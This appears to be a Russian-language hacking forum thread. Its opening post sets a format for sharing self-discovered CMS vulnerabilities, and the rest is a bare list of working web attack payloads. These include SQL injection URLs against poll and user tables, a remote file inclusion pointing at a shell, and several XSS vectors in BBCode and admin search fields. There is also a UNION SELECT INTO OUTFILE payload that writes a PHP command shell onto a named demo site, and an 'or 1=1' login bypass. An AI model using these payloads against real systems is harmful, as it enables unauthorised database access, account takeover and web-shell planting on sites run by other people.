Здесь выкладываем только те уязвимости которые вы нашли сами никакой перепечатки и т.п. Уязвимость должна обыть описана в таком формате к примеру: Название:MegaCool CMS Название вашего эксплоита:MegaCool killer Описание уязвимости: Неавторизированный доступ к БД. Не посредственно сам эксплоит: по идеи должен быть тут. Автор: Я или же так: Название:MegaCool CMS Уязвимость:MegaCool xss Описание уязвимости: Активная xss позволяющая стать мега-админом. Автор: Я Так и только так.
http://site/index.php?option=polls&Itemid;=0&pollid;=[id]/**/and/**/[подзапрос]
где [id] — реально существующий id голосования, [подзапрос] — логическое выражение.http://site/index.php?option=polls&Itemid;=0&pollid;=[id]/**/and/**/substring((SELECT/**/1/**/from/**/%23__users),1,1)=1
http://[site]/index.php?_CONFIG[files][functions_page]=[шелл]
[*url]http://asd.asd[*email][email protected] onmouseover=alert() bla=[*/email][*/url]
<a href="[color=blue]http://asd.asd<a href=[/color]«mailto:[email protected] onmouseover=alert() bla=» target="_blank">[email protected] onmouseover=alert() bla=" target="_blank">http://asd.asd[email protected] onmouseover=alert() bla=
[*url]http://asd.asd[*email][email protected] style=display:none;olo:expression(alert());-moz-binding:url() bla=[*/email][*/url]
$attrib_value = preg_replace("/javascript:/ixu", '', $attrib_value);
/>
http://localhost/administrator/index.php?option=com_content&search;=%22%20size=100%20onmouseover=alert()%20bla
http://demo.compactcms.nl/afdrukken.php?page='+union+select+'<?system($_GET[c]);?>'+INTO+OUTFILE+'shell.php'--
post /admin/login.php user_name=%c327+or+1=1--
$orderby = ' ORDER BY '. $filter_order .' '. $filter_order_Dir;
http://localhost/mycrocms/?entry_id='
[/indent]